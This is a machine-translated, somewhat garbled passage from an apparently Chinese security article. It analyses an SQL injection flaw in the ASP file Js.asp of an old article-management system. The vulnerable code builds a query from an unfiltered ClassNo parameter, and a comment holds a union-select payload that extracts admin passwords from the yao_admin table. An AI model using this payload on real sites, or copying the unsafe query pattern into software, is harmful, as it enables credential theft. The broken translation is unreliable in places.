Summary of script vulnerabilities in

 Magic spring[B .S.N]

Follow07Years of search injection and08YearsCookiesAfter injection,09What are the new changes to the script vulnerabilities in the year? Let's take a look at this article.

Case1: Anti-injection code, anti-Injection

Here we use the oldYSystem. Vulnerability occurs inJs. aspFile.

 

If CheckStr (Request ("ClassNo") <> "then
ClassNo = split (CheckStr (Request ("ClassNo"), "| ")
Here is the usage of getting VariablesCheckstrFilter, but it does not seem to work. Split into Arrays
On error resume next
NClassID = LaoYRequest (ClassNo (0 ))
NClassID1 = LaoYRequest (ClassNo (1 ))
Obtain an array1, And Array2Perform integer filtering. No Vulnerability
End if

Num = LaoYRequest (request. querystring ("num "))HereNumRequired> = 1
.......
Set rs = server. createObject ("Adodb. recordset ")
SQL = "Select top" & num & "ID, Title, TitleFontColor, Author, ClassID, DateAndTime, Hits, IsTop, IsHot from Yao_Article Where yn = 0"

If NclassID <> "and NclassID1 =" "then
If Yao_MyID (NclassID) = "0" then
SQL = SQL & "and ClassID =" & NclassID &""
Else
MyID = Replace ("" & Yao_MyID (NclassID) & "", "| ",",")
SQL = SQL & "and ClassID in (" & MyID & ")" 'in (1, 2, 3)
End if
Elseif NclassID <> "" and NclassID1 <> "" then
MyID = Replace ("" & Request ("ClassNo") & "", "| ",",")'Put all|Filter, 1 | 1 | 2 | 2 | 2 myid =, 2
SQL = SQL & "and ClassID in (" & MyID & ")" 'in (, 2) union select 1, admin_pass, 9 from yao_admin where id in (1)